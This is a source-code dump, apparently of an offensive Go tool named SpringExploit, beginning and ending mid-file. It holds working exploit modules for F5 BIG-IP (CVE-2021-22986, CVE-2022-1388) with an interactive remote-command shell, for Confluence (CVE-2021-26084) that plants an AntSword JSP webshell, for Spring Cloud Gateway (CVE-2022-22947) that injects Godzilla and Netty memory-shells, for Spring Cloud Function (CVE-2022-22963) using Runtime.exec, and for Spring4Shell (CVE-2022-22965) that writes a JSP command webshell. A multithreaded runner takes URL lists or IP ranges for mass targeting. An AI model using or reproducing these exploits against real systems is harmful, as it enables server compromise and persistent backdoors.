| case 6: 136 | log.SetLevel(log.PanicLevel) 137 | case 7: 138 | log.SetLevel(log.TraceLevel) 139 | default: 140 | log.SetLevel(log.InfoLevel) 141 | //log.SetLevel(log.DebugLevel) 142 | } 143 | } else { 144 | log.SetLevel(log.DebugLevel) 145 | } 146 | 147 | } 148 | -------------------------------------------------------------------------------- /cmd/commons/core/runner.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "encoding/json" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/attack" 6 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 7 | "github.com/fatih/structs" 8 | "github.com/panjf2000/ants/v2" 9 | log "github.com/sirupsen/logrus" 10 | "net/url" 11 | "sync" 12 | ) 13 | 14 | type Runner struct { 15 | options *Options 16 | } 17 | 18 | func NewRunner(options *Options) (*Runner, error) { 19 | r := Runner{options: options} 20 | 21 | mops := structs.Map(&r.options) 22 | data, _ := json.Marshal(mops) 23 | log.Debug("Runner created") 24 | log.Debug(mops) 25 | log.Debug("Runner options: ", string(data)) 26 | return &r, nil 27 | 28 | } 29 | 30 | func (r *Runner) Run() { 31 | log.Info("Starting SpringExploit") 32 | log.Debug("Runner Running") 33 | //ip := r.options.IP 34 | var urls []string 35 | // TODO: check if options are valid 36 | //r.options.Url = "http://127.0.0.1:8090/" 37 | 38 | if r.options.Url != "" { 39 | urls = append(urls, r.options.Url) 40 | } else if r.options.File != "" { 41 | urls, _ = utils.ReadFile(r.options.File) 42 | } else if r.options.IP != "" { 43 | urls = utils.GetIPToUrlsLinks(r.options.IP, urls) 44 | } else if r.options.Update { 45 | // go update 46 | //selfUpdate() 47 | // go github update 48 | doSelfUpdate() 49 | return 50 | } else if r.options.Version { 51 | // go update 52 | //getLatestVersion() 53 | // go github update 54 | confirmAndSelfUpdate() 55 | return 56 | } else if r.options.SP { 57 | return 58 | } else { 59 | log.Error("No file or url or ips 
specified") 60 | return 61 | } 62 | 63 | log.Debugln("URLs Numbers: ", len(urls)) 64 | var i = 0 65 | k := r.options.Thread 66 | var wg sync.WaitGroup 67 | hashmap := structs.Map(&r.options) 68 | defer ants.Release() 69 | // TODO: check if options are valid 70 | if k <= 0 { 71 | k = 500 72 | } 73 | log.Info("Running with ", k, " threads") 74 | pool, err1 := ants.NewPool(k+1, ants.WithPreAlloc(true)) 75 | if err1 != nil { 76 | log.Error("Error creating pool") 77 | return 78 | } 79 | log.Info("Total URLs: ", len(urls)) 80 | 81 | for i < len(urls) { 82 | //TODO 老代码 83 | //for t := 0; t < k; t++ { 84 | // if i == len(urls) { 85 | // break 86 | // } 87 | // if urls[i] != "" { 88 | // log.Debugln("Running attack on: ", urls[i]) 89 | // // 通道通信 发送url 并且 i++ 90 | // c := make(chan int) 91 | // wg.Add(1) 92 | // go func() { 93 | // log.Debugf("Running go func() %d", t) 94 | // Start(urls[i], hashmap, i, c) // Start k goroutines 95 | // wg.Done() 96 | // }() 97 | // i = <-c 98 | // } else { 99 | // wg.Wait() 100 | // i++ 101 | // break 102 | // } 103 | //} 104 | 105 | for t := 0; t < k; t++ { 106 | j := i 107 | task := func() { 108 | log.Debugf("Running Submit threads %d url is %s %d", t, urls[j], j) 109 | Start2(urls[j], hashmap) // Start k goroutines 110 | wg.Done() 111 | } 112 | if i == len(urls) { 113 | break 114 | } 115 | if urls[i] != "" { 116 | // 通道通信 发送url 并且 i++ 117 | //c := make(chan int) 118 | log.Debugf("Now Threads: %d", t) 119 | wg.Add(1) 120 | err := pool.Submit(task) 121 | i++ 122 | if err != nil { 123 | log.Error("Error submitting job " + urls[i]) 124 | log.Error(err) 125 | } 126 | //i = <-c 127 | } else { 128 | i++ 129 | wg.Wait() 130 | } 131 | } 132 | 133 | } 134 | wg.Wait() 135 | 136 | } 137 | 138 | func Start(u string, hashmap map[string]interface{}, i int, c chan int) { 139 | log.Info("Runner started") 140 | log.Infoln("Pen-testing URL: ", u) 141 | //for k, v := range hashmap { 142 | // log.Debugln("key: ", k, " value: ", v) 143 | //} 144 | r, err := 
url.Parse(u) 145 | if err != nil { 146 | log.Info("URL parse error") 147 | log.Errorln(err) 148 | return 149 | } 150 | var target string 151 | if r.Path == "" { 152 | target = r.Scheme + "://" + r.Host + "/" 153 | } else { 154 | target = r.Scheme + "://" + r.Host + r.Path 155 | } 156 | attack.Sevice(target, hashmap) 157 | defer func() { 158 | if errs := recover(); errs != nil { 159 | log.Debug("Runner panic: ", errs) 160 | } 161 | }() 162 | // 放到最后,不然无法生效 163 | c <- i + 1 164 | 165 | } 166 | 167 | func Start2(u string, hashmap map[string]interface{}) { 168 | log.Infof("%s Runner started", u) 169 | //log.Infoln("testing URL: ", u) 170 | //for k, v := range hashmap { 171 | // log.Debugln("key: ", k, " value: ", v) 172 | //} 173 | //defer func() { 174 | // if errs := recover(); errs != nil { 175 | // log.Debug(errs) 176 | // } 177 | //}() 178 | 179 | r, err := url.Parse(u) 180 | if err != nil { 181 | log.Info("URL parse error") 182 | log.Errorln(err) 183 | return 184 | } 185 | var target string 186 | if r.Path == "" { 187 | target = r.Scheme + "://" + r.Host + "/" 188 | } else { 189 | target = r.Scheme + "://" + r.Host + r.Path 190 | } 191 | attack.Sevice(target, hashmap) 192 | log.Infof("%s Runner finished", u) 193 | 194 | } 195 | -------------------------------------------------------------------------------- /cmd/commons/core/update.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | // 4 | //import ( 5 | // log "github.com/sirupsen/logrus" 6 | // "github.com/tj/go-update" 7 | // "github.com/tj/go-update/progress" 8 | // githubUpdateStore "github.com/tj/go-update/stores/github" 9 | // "runtime" 10 | // "strings" 11 | //) 12 | // 13 | //const ( 14 | // Owner = "SummerSec" 15 | // Repo = "SpringExploit" 16 | //) 17 | // 18 | //func selfUpdate() { 19 | // var command string 20 | // 21 | // //// get current executable path 22 | // //executable, err := os.Executable() 23 | // //if err != nil { 24 | // // 
log.Fatal(err) 25 | // //} 26 | // 27 | // switch runtime.GOOS { 28 | // case "windows": 29 | // command = Repo + ".exe" 30 | // default: 31 | // command = Repo 32 | // } 33 | // log.Debugf("command: %s", command) 34 | // m := &update.Manager{ 35 | // Command: command, 36 | // Store: &githubUpdateStore.Store{ 37 | // Owner: Owner, 38 | // Repo: Repo, 39 | // Version: version, 40 | // }, 41 | // } 42 | // 43 | // releases, err := m.LatestReleases() 44 | // if err != nil { 45 | // log.Error("Failed to get releases", err) 46 | // return 47 | // } 48 | // if len(releases) == 0 { 49 | // log.Info("No updates available") 50 | // return 51 | // } 52 | // latest := releases[0] 53 | // var currentOS string 54 | // switch runtime.GOOS { 55 | // case "darwin": 56 | // currentOS = "macOS" 57 | // default: 58 | // currentOS = runtime.GOOS 59 | // } 60 | // final := latest.FindZip(currentOS, runtime.GOARCH) 61 | // if final == nil { 62 | // log.Error("No update available for", currentOS, "and", runtime.GOARCH) 63 | // } 64 | // tarball, err := final.DownloadProxy(progress.Reader) 65 | // if err != nil { 66 | // log.Error("could not install latest release ", err) 67 | // return 68 | // } 69 | // if err := m.Install(tarball); err != nil { 70 | // log.Error("could not install latest release", err) 71 | // return 72 | // } 73 | // 74 | // log.Infof("Successfully Updated to %s Version %s", Repo, latest.Version) 75 | // 76 | //} 77 | // 78 | //// 获取最新版本 79 | //func getLatestVersion() { 80 | // log.Info("Crrunent Version : ", version) 81 | // latestverion := getLatestVersionFromGithub() 82 | // log.Infof("Latest Version: %s", latestverion) 83 | // if strings.Compare(latestverion, version) > 0 { 84 | // log.Info("Use Command SpringExploit -update to update to latest version ") 85 | // } 86 | // 87 | //} 88 | // 89 | //// 从github获取最新版本 90 | //func getLatestVersionFromGithub() string { 91 | // m := &update.Manager{ 92 | // Store: &githubUpdateStore.Store{ 93 | // Owner: Owner, 94 | // 
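// confirmAndSelfUpdate looks up the latest release of the repository named by
// info, asks the operator on stdin whether to install it and, only after an
// explicit "y" or "Y", replaces the running executable with the release asset.
//
// "n" or "N" declines silently; a read error or any other answer is reported
// as invalid input. In every one of those cases the binary is left untouched.
func confirmAndSelfUpdate() {
	latest, found, err := selfupdate.DetectLatest(info)
	if err != nil {
		log.Infoln("Error occurred while detecting version:", err)
		return
	}

	// Parse instead of MustParse: a malformed version string should end the
	// update attempt with a message, not panic the program.
	v, err := semver.Parse(version)
	if err != nil {
		log.Infoln("Could not parse current version:", err)
		return
	}
	if !found || latest.Version.LTE(v) {
		log.Infof("Current version is the latest version %s", version)
		return
	}

	fmt.Print("Do you want to update to latest version ", latest.Version, "? (y/n): ")
	input, err := bufio.NewReader(os.Stdin).ReadString('\n')
	// Check the read error before interpreting the answer.
	if err != nil {
		log.Println("Invalid input")
		return
	}
	// Strip a trailing \r\n, \n or \r from the answer.
	if stringsutil.HasSuffixAny(input, "\r\n", "\n", "\r") {
		input = stringsutil.TrimSuffixAny(input, "\r\n", "\n", "\r")
	}

	// Replacing the executable requires explicit consent. Previously "N" passed
	// validation but only lowercase "n" stopped the update, so an uppercase
	// refusal still installed the new binary.
	switch input {
	case "y", "Y":
		// Consent given; continue below.
	case "n", "N":
		return
	default:
		log.Println("Invalid input")
		return
	}

	exe, err := os.Executable()
	if err != nil {
		log.Println("Could not locate executable path")
		return
	}

	// NOTE(review): this function configures no checksum or signature
	// validation for the downloaded asset; the file at exe is overwritten with
	// whatever latest.AssetURL serves. Confirm what integrity checking the
	// library's default updater performs and consider an updater configured
	// with a Validator.
	if err := selfupdate.UpdateTo(latest.AssetURL, exe); err != nil {
		log.Println("Error occurred while updating binary:", err)
		return
	}
	log.Println("Successfully updated to version", latest.Version)
}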
27 | } 28 | for _, tt := range tests { 29 | t.Run(tt.name, func(t *testing.T) { 30 | //if got := getLatestVersionFromGithub(); got != tt.want { 31 | // t.Errorf("getLatestVersionFromGithub() = %v, want %v", got, tt.want) 32 | //} 33 | }) 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /cmd/commons/poc/2021/CVE-2021-22986.go: -------------------------------------------------------------------------------- 1 | package _021 2 | 3 | import ( 4 | "encoding/json" 5 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 6 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 7 | "github.com/c-bata/go-prompt" 8 | "github.com/imroc/req/v3" 9 | log "github.com/sirupsen/logrus" 10 | "net/url" 11 | "strings" 12 | ) 13 | 14 | // 参考 https://github.com/Al1ex/CVE-2021-22986/blob/main/CVE_2021_22986.pyl 15 | 16 | type CVE202122986 struct{} 17 | 18 | func (t CVE202122986) SendPoc(target string, hashmap map[string]interface{}) { 19 | log.Debug("[+] Start CVE-2021-22986") 20 | 21 | //reqinfo := req2.NewReqInfo() 22 | //reqmap := structs.Map(reqinfo) 23 | reqmap := req2.NewReqInfoToMap(hashmap) 24 | 25 | // 初始化请求 26 | // TODO 可以设置超时时间 重复次数 代理等 下面默认使用默认值 27 | reqmap["h1"] = true 28 | 29 | u, _ := url.Parse(target) 30 | path := "/mgmt/tm/util/bash" 31 | reqmap["url"] = u.Scheme + "://" + u.Host + path 32 | reqmap["method"] = "POST" 33 | 34 | headers := map[string]string{ 35 | //"Host": "localhost", 36 | "User-Agent": utils.GetUA(), 37 | //"Connection": "keep-alive, x-f5-auTh-tOKen, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host", 38 | //"Connection": "keep-alive", 39 | "Authorization": "Basic YWRtaW46QVNhc1M=", 40 | "X-F5-Auth-Token": "", 41 | "Content-Type": "application/json", 42 | } 43 | 44 | reqmap["headers"] = headers 45 | 46 | randstr := utils.GetCode(10) 47 | log.Debugf("[+] randstr: %s", randstr) 48 | base64str := utils.EncodeBase64String(randstr) 49 | 
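// CheckExp reports whether the response body contains the random marker
// randstr and parses as a JSON object.
//
// Parameters:
//   - resp:    response returned for the probe request.
//   - randstr: random marker the probe asked the remote side to echo back.
//   - hashmap: runner options; not read here.
//
// It returns false for an empty body, a body without the marker, a body that
// is not valid JSON, or when reading the response panics.
func (CVE202122986) CheckExp(resp *req.Response, randstr string, hashmap map[string]interface{}) bool {
	defer func() {
		if err := recover(); err != nil {
			log.Error("[-] CheckExp error: ", err)
		}
	}()

	res := resp.String()
	if res == "" {
		return false
	}
	// The body comes from the remote host and is untrusted: log it as an
	// argument, never as the format string, or '%' sequences in it are
	// interpreted as formatting verbs.
	log.Debug(res)

	if !strings.Contains(res, randstr) {
		return false
	}

	// Decode the body into a map and check the error before reading from it;
	// previously commandResult was logged from a map that may not have been
	// populated.
	var maps map[string]interface{}
	if err := json.Unmarshal([]byte(res), &maps); err != nil {
		log.Debugf("[-] json.Unmarshal error: %s", err)
		return false
	}
	log.Info("CVE-2021-22986 命令执行返回 commandResult: ", maps["commandResult"])
	return true
}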
"User-Agent": utils.GetUA(), 26 | "Content-Type": "application/x-www-form-urlencoded", 27 | } 28 | 29 | // 默认配置 30 | reqmap["timeout"] = hashmap["Timeout"].(int) 31 | reqmap["retry"] = hashmap["Retry"].(int) 32 | reqmap["proxy"] = hashmap["Proxy"].(string) 33 | reqmap["mode"] = hashmap["Mode"].(int) 34 | reqmap["h1"] = hashmap["H1"].(bool) 35 | reqmap["redirect"] = hashmap["Redirect"].(bool) 36 | 37 | file := hashmap["Out"].(string) 38 | utils.Send(reqmap) 39 | 40 | // 验证是否利用成功 41 | reqmap["url"] = target + "testAnt.jsp" 42 | reqmap["method"] = "GET" 43 | reqmap["body"] = "" 44 | 45 | resp := utils.Send(reqmap) 46 | 47 | if p.CheckExp(resp, target, hashmap) { 48 | context := target + " 存在CVE-2021-26084漏洞!" + target + "testAnt.jsp 蚁剑密码 ant " 49 | log.Info(context) 50 | p.SaveResult(context, file) 51 | } 52 | 53 | } 54 | 55 | func (CVE202126084) init() { 56 | log.Debugf("CVE-2021-26084 init") 57 | } 58 | 59 | func (CVE202126084) SaveResult(target string, file string) { 60 | err := utils.SaveToFile(target, file) 61 | if err != nil { 62 | log.Debugf("CVE-2021-26084 SaveResult error: %s", err) 63 | return 64 | } 65 | } 66 | 67 | func (CVE202126084) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool { 68 | if resp.IsSuccess() { 69 | log.Debugf(resp.Dump()) 70 | return true 71 | } 72 | return false 73 | 74 | } 75 | -------------------------------------------------------------------------------- /cmd/commons/poc/2022/CVE-2022-1388.go: -------------------------------------------------------------------------------- 1 | package _022 2 | 3 | // 参考 https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml 4 | import ( 5 | "encoding/json" 6 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 7 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 8 | "github.com/c-bata/go-prompt" 9 | "github.com/imroc/req/v3" 10 | log "github.com/sirupsen/logrus" 11 | "net/url" 12 | "strings" 13 | ) 14 | 15 | type CVE20221388 
struct{} 16 | 17 | func (t CVE20221388) SendPoc(target string, hashmap map[string]interface{}) { 18 | log.Debug("[+] Start CVE-2022-1388") 19 | 20 | //reqinfo := req2.NewReqInfo() 21 | //reqmap := structs.Map(reqinfo) 22 | reqmap := req2.NewReqInfoToMap(hashmap) 23 | 24 | // 初始化请求 25 | // TODO 可以设置超时时间 重复次数 代理等 下面默认使用默认值 26 | reqmap["h1"] = true 27 | 28 | u, _ := url.Parse(target) 29 | path := "/mgmt/tm/util/bash" 30 | reqmap["url"] = u.Scheme + "://" + u.Host + path 31 | reqmap["method"] = "POST" 32 | 33 | headers := map[string]string{ 34 | "Host": "localhost", 35 | "User-Agent": utils.GetUA(), 36 | //"Connection": "keep-alive, x-f5-auTh-tOKen, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host", 37 | "Connection": "keep-alive, x-f5-auTh-tOKen", 38 | "Authorization": "Basic YWRtaW46", 39 | "X-F5-Auth-Token": utils.GetCode(5), 40 | "Content-Type": "application/json", 41 | } 42 | 43 | reqmap["headers"] = headers 44 | 45 | randstr := utils.GetCode(10) 46 | log.Debugf("[+] randstr: %s", randstr) 47 | base64str := utils.EncodeBase64String(randstr) 48 | log.Debugf("[+] base64str: %s", base64str) 49 | 50 | reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo " + base64str + " | base64 -d'\"}" 51 | //reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}" 52 | log.Debug("[+] Send CVE-2022-1388 request") 53 | resp := utils.Send(reqmap) 54 | 55 | if t.CheckExp(resp, randstr, hashmap) { 56 | t.SaveResult(target, hashmap["Out"].(string)) 57 | } 58 | 59 | if hashmap["Shell"].(bool) { 60 | log.Info("[+] Start CVE-2022-1388 shell") 61 | th := prompt.Input("[+] Please input command: ", completer) 62 | if th == "" { 63 | th = "whoami |base64 " 64 | } else { 65 | th = th + " |base64 " 66 | } 67 | reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c '" + th + "'\"}" 68 | resp = utils.Send(reqmap) 69 | txt := resp.String() 70 | 71 | log.Debugf("[+] resp: %s", txt) 72 | var txtmap 
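// CheckExp reports whether the response body contains the random marker
// randstr and parses as a JSON object.
//
// Parameters:
//   - resp:    response returned for the probe request.
//   - randstr: random marker the probe asked the remote side to echo back.
//   - hashmap: runner options; not read here.
//
// It returns false for a nil response, a body that cannot be read or is empty,
// a body without the marker, or a body that is not valid JSON.
func (CVE20221388) CheckExp(resp *req.Response, randstr string, hashmap map[string]interface{}) bool {
	// NOTE(review): other callers in this project nil-check the value returned
	// by utils.Send, so a failed request presumably yields nil; guard here
	// because this method has no recover of its own.
	if resp == nil {
		return false
	}

	res, err := resp.ToString()
	if err != nil || res == "" {
		return false
	}
	// The body comes from the remote host and is untrusted: log it as an
	// argument, never as the format string.
	log.Debug(res)

	if !strings.Contains(res, randstr) {
		return false
	}

	// Decode the body into a map and check the error before reading from it.
	var maps map[string]interface{}
	if err := json.Unmarshal([]byte(res), &maps); err != nil {
		log.Debugf("[-] json.Unmarshal error: %s", err)
		return false
	}
	log.Info("CVE-2022-1388 命令执行返回 commandResult: ", maps["commandResult"])
	return true
}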
9 | log "github.com/sirupsen/logrus" 10 | "strings" 11 | ) 12 | 13 | // 参考 https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/ 14 | 15 | //NettyMemshell 16 | const mem = "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" 17 | 18 | //SpringRequestMappingMemshell 19 | const mem1 = "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" 20 | 21 | // Godzilla 哥斯拉内存马 密码和key pass key header添加sumsec; 1字段 22 | const Godzilla = "" 23 | 24 | const memshell = "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}" 25 | 26 | const memshell1 = "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('SpringRequestMappingMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping)}" 27 | 28 | const memshell3 = "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GodzillaNettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}" 29 | 30 | type CVE202222947 struct{} 31 | 32 | func (p CVE202222947) SendPoc(target string, hashmap map[string]interface{}) { 33 | NettyMemshell := fmt.Sprintf(memshell, mem) 34 | SpringRequestMappingMemshell := fmt.Sprintf(memshell1, mem1) 35 | GodzillaNettyMemshell := fmt.Sprintf(memshell3, Godzilla) 36 | log.Debugln("GodzillaNettyMemshell: \n" + GodzillaNettyMemshell) 37 | log.Debugf("SpringRequestMappingMemshell: \n", SpringRequestMappingMemshell) 38 | log.Debugln("NettyMemshell: \n" + NettyMemshell) 39 | log.Debugf("[+] Running default poc") 40 | reqinfo := 
req2.NewReqInfo() 41 | reqmap := structs.Map(reqinfo) 42 | // 解析target 43 | //t, _ := url.Parse(target) 44 | //target = t.Scheme + "://" + t.Host + "/" 45 | 46 | reqmap["url"] = target 47 | reqmap["method"] = "POST" 48 | // 默认随机UA 不需要设置 49 | reqmap["headers"] = map[string]string{ 50 | "User-Agent": utils.GetUA(), 51 | //"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", 52 | "Content-Type": "application/json", 53 | "Accept-Encoding": "gzip, deflate", 54 | "Accept": "*/*", 55 | } 56 | id := utils.GetCode(6) 57 | payload := "{\n \"id\": \"%s\",\n \"filters\": [{\n \"name\": \"AddResponseHeader\",\n \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n }],\n \"uri\": \"http://127.0.0.1\",\n \"order\": 0\n}" 58 | a := fmt.Sprintf(payload, id, GodzillaNettyMemshell) 59 | reqmap["body"] = a 60 | // 默认配置 61 | reqmap["timeout"] = hashmap["Timeout"].(int) 62 | reqmap["retry"] = hashmap["Retry"].(int) 63 | reqmap["proxy"] = hashmap["Proxy"].(string) 64 | reqmap["mode"] = hashmap["Mode"].(int) 65 | reqmap["h1"] = hashmap["H1"].(bool) 66 | reqmap["redirect"] = hashmap["Redirect"].(bool) 67 | 68 | f := 0 69 | for true { 70 | // 第一次请求 71 | t := target + "actuator/gateway/routes/" + id 72 | reqmap["url"] = t 73 | utils.Send(reqmap) 74 | // 第二次请求 75 | t = target + "actuator/gateway/refresh" 76 | reqmap["url"] = t 77 | reqmap["body"] = "" 78 | 79 | utils.Send(reqmap) 80 | // 第三次请求 81 | t = target + "actuator/gateway/routes/" + id 82 | reqmap["url"] = t 83 | reqmap["method"] = "GET" 84 | resp := utils.Send(reqmap) 85 | // 第四次请求 86 | reqmap["method"] = "DELETE" 87 | utils.Send(reqmap) 88 | // 第五次请求 89 | t = target + "actuator/gateway/refresh" 90 | reqmap["url"] = t 91 | reqmap["method"] = "POST" 92 | utils.Send(reqmap) 93 | 94 | if p.CheckExp(resp, target, hashmap) { 95 | log.Info("[+] Successful exploitation CVE-2020-222947") 96 | p.SaveResult(target, hashmap["Out"].(string)) 97 | break 98 | } else if 
// CheckExp decides whether the route request left the expected marker in the
// response and records the result.
//
// It looks for the literal "route_id" in resp.Dump(). When present, it sends a
// follow-up GET to url carrying the same marker command in the cmd query
// parameter and in the X-CMD header, and looks for "route_id" in that reply.
//
// NOTE(review): both paths inside the outer match return true, so the
// follow-up reply does not influence the verdict; a positive from this method
// means only that "route_id" appeared in the first dump and should be treated
// as unconfirmed.
// NOTE(review): SaveResult is called here on the inner match, and the caller
// in SendPoc calls it again when this method returns true, so one target can
// be written twice.
// NOTE(review): the log text says CVE-2020-222947 while the type and file are
// named for CVE-2022-22947.
func (p CVE202222947) CheckExp(resp *req.Response, url string, hashmap map[string]interface{}) bool {
	// Any panic below (nil response, failed type assertion) is logged here;
	// the function then returns the zero value, false.
	defer func() {
		if err := recover(); err != nil {
			log.Error("[-] CheckExp error: ", err)
		}
	}()
	log.Debug(resp)
	res := resp.Dump()
	// Panics if "Out" is missing or not a string; caught by the recover above.
	file := hashmap["Out"].(string)
	y := utils.EncodeBase64String("route_id")

	log.Debugf("[+] res:%s", res)
	if strings.Contains(res, "route_id") {
		qustr := "echo " + y + "|base64 -d"
		// The error from Send is discarded; NOTE(review): if the request fails,
		// re may be nil and re.String() would panic into the recover above.
		re, _ := req.R().SetQueryString("cmd="+qustr).SetHeader("X-CMD", qustr).Send("GET", url)
		res2 := re.String()
		log.Debugf("[+] res2:%s", res2)
		if strings.Contains(res2, "route_id") {
			log.Debugln("[+] Result: " + re.String())
			log.Info("[+] Successful exploitation CVE-2020-222947")
			// Message asks the operator to verify the result manually.
			log.Info("[*] 请手动验证是否漏洞利用成功!")
			p.SaveResult(url, file)
			return true
		}
		return true
	}
	return false
}
默认优先注入哥斯拉内存马、NettyMemshell、SpringRequestMappingMemshell") 156 | err := utils.SaveToFile(contexts, file) 157 | if err != nil { 158 | log.Error("[-] SaveResult error: ", err) 159 | return 160 | } 161 | } 162 | -------------------------------------------------------------------------------- /cmd/commons/poc/2022/CVE-2022-22963.go: -------------------------------------------------------------------------------- 1 | package _022 2 | 3 | import ( 4 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | "github.com/fatih/structs" 7 | "github.com/imroc/req/v3" 8 | log "github.com/sirupsen/logrus" 9 | ) 10 | 11 | type CVE202222963 struct{} 12 | 13 | func (p CVE202222963) SendPoc(target string, hashmap map[string]interface{}) { 14 | 15 | reqinfo := req2.NewReqInfo() 16 | reqmap := structs.Map(reqinfo) 17 | url := target + "functionRouter" 18 | reqmap["url"] = url 19 | reqmap["method"] = "POST" 20 | dnslog := &utils.Dnslog{} 21 | dnslog.SetId("CVE-2022-22963") 22 | ranStr := dnslog.Id() 23 | dnslog.SetPre("dns") 24 | cmd := "nslookup " + ranStr + ".skysa.eyes.sh" 25 | //cmd := "calc.exe" 26 | log.Debugln(cmd) 27 | payload := "T(java.lang.Runtime).getRuntime().exec(\"" + cmd + "\")" 28 | //payload := "T(java.net.InetAddress).getByName(\"" + ranStr + ".skysa.eyes.sh\")" 29 | log.Debugf("payload: %s", payload) 30 | log.Debugf("dnslog: %s", dnslog) 31 | // 默认参数 32 | reqmap["timeout"] = hashmap["Timeout"].(int) 33 | reqmap["retry"] = hashmap["Retry"].(int) 34 | reqmap["proxy"] = hashmap["Proxy"].(string) 35 | reqmap["mode"] = hashmap["Mode"].(int) 36 | reqmap["h1"] = hashmap["H1"].(bool) 37 | reqmap["redirect"] = hashmap["Redirect"].(bool) 38 | reqmap["headers"] = map[string]string{ 39 | "User-Agent": utils.GetUA(), 40 | "Content-Type": "application/x-www-form-urlencoded", 41 | //"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", 42 | 
"spring.cloud.function.routing-expression": payload, 43 | } 44 | 45 | reqmap["method"] = "POST" 46 | reqmap["body"] = ranStr 47 | // 发送请求 48 | resp := utils.Send(reqmap) 49 | 50 | res := dnslog.GetDnslog() 51 | if res { 52 | if p.CheckExp(resp, target, hashmap) { 53 | log.Infof("[+] %s: %s", target, "CVE-2022-22963") 54 | p.SaveResult(target, hashmap["Out"].(string)) 55 | } 56 | } 57 | 58 | } 59 | 60 | func (CVE202222963) init() { 61 | log.Debugf("CVE-2022-22963 init") 62 | 63 | } 64 | 65 | func (CVE202222963) SaveResult(target string, file string) { 66 | contexts := target + " 存在CVE-2022-22963漏洞" 67 | err := utils.SaveToFile(contexts, file) 68 | if err != nil { 69 | log.Debugf("[-] Save result failed") 70 | log.Debugf(err.Error()) 71 | return 72 | } 73 | } 74 | 75 | func (p CVE202222963) CheckExp(resp *req.Response, dnslog string, hashmap map[string]interface{}) bool { 76 | log.Debugf("CVE-2022-22963 checkExp") 77 | return true 78 | 79 | } 80 | -------------------------------------------------------------------------------- /cmd/commons/poc/2022/CVE-2022-22965.go: -------------------------------------------------------------------------------- 1 | package _022 2 | 3 | import ( 4 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | "github.com/fatih/structs" 7 | "github.com/imroc/req/v3" 8 | log "github.com/sirupsen/logrus" 9 | "net/url" 10 | "time" 11 | ) 12 | 13 | type CVE202222965 struct{} 14 | 15 | const ( 16 | body = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=" 17 | context = "%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di" 18 | body1 = 
"&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=" 19 | //body1 = "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=G:\\source\\spring-framework-rce\\target\\spring_framework_rce-0.0.1-SNAPSHOT\\&class.module.classLoader.resources.context.parent.pipeline.first.prefix=" 20 | // 添加 shell 文件名 21 | body2 = "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" 22 | //behinder = "%25%7Bprefix%7Di%20%40page%20import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%7Bsuffix%7Di%20%25%7Bprefix%7Di%20!class%20U%20extends%20ClassLoader%7BU(ClassLoader%20c)%7Bsuper(c)%3B%7Dpublic%20Class%20g(byte%20%5B%5Db)%7Breturn%20super.defineClass(b%2C0%2Cb.length)%3B%7D%7D%25%7Bsuffix%7Di%25%7Bprefix%7Di%20if%20(request.getMethod().equals(%22POST%22))%7BString%20k%3D%22e45e329feb5d925b%22%3Bsession.putValue(%22u%22%2Ck)%3BCipher%20c%3DCipher.getInstance(%22AES%22)%3Bc.init(2%2Cnew%20SecretKeySpec(k.getBytes()%2C%22AES%22))%3Bnew%20U(this.getClass().getClassLoader()).g(c.doFinal(new%20sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3B%7D%25%7Bsuffix%7Di" 23 | 24 | // 